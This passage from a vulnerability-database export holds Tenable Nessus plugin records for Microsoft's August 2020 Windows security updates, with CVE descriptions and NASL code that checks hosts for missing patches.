"CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1529", "CVE-2020-1538", "CVE-2020-1552", "CVE-2020-1554", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1567", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_4571703.NASL", "href": "https://www.tenable.com/plugins/nessus/139489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139489);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1529\",\n \"CVE-2020-1538\",\n \"CVE-2020-1552\",\n \"CVE-2020-1554\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1567\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571703\");\n script_xref(name:\"MSKB\", value:\"4571723\");\n script_xref(name:\"MSFT\", value:\"MS20-4571703\");\n script_xref(name:\"MSFT\", value:\"MS20-4571723\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571723: Windows 8.1 and Windows Server 2012 R2 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571723\nor cumulative update 4571703. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571723/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571703/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4571723 or Cumulative Update KB4571703.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571703',\n '4571723'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (!\n (smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571703, 4571723])\n )\n)\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\nelse\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:18", "description": "The remote Windows host is missing security update 4571694.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486, CVE-2020-1566)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571694: Windows 10 Version 1607 and Windows Server 2016 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1549", "CVE-2020-1550", "CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4571694.NASL", "href": "https://www.tenable.com/plugins/nessus/139488", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139488);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n 